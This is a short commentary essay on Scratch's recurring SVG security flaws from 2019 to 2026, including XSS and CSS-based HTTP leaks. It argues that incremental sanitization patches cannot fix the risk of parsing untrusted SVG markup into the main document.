Scratch has long struggled with securing user-generated SVG content, leading to repeated vulnerabilities that expose users to XSS attacks and data leaks. The platform’s approach—parsing attacker-controlled SVGs into the main document for operations like bounding box measurements—remains inherently risky. Despite years of incremental fixes, new exploits keep emerging, revealing a flawed strategy that prioritizes complexity over fundamental security.

The vulnerabilities began in 2019 when Scratch discovered XSS risks via `<script>` tags in SVGs. A regex-based fix was implemented, but in 2020, a case-sensitive regex allowed bypasses, and alternative methods like inline event handlers persisted. By 2023, CSS `@import` statements enabled HTTP leaks, prompting a CSS parser integration. Yet in 2024, unsanitized SVGs passed to Paper.js reignited XSS risks, and 2025 revealed lingering flaws in URL handling within CSS `url()` functions. Each “fix” addressed only specific attack vectors, leaving gaps that attackers exploited.

Scratch’s reliance on DOMPurify and custom sanitization code highlights the challenge of securing SVG ecosystems. The 2020 bypass of the regex fix, for instance, exposed millions of users to account takeovers, while 2023’s HTTP leak via CSS demonstrated how even reputable libraries can fail against novel vectors. The 2026 update added layers of complexity to address escaped URLs and CSS variables, yet the cycle continues.

Today, Scratch’s SVG handling remains a cautionary tale: no matter how many layers of sanitization are added, the inherent risks of parsing untrusted markup persist. Until Scratch rethinks its architecture—or avoids embedding SVGs directly into the DOM—the platform will never be truly safe. XSS and HTTP leaks will endure until a root-cause solution replaces incremental patchwork.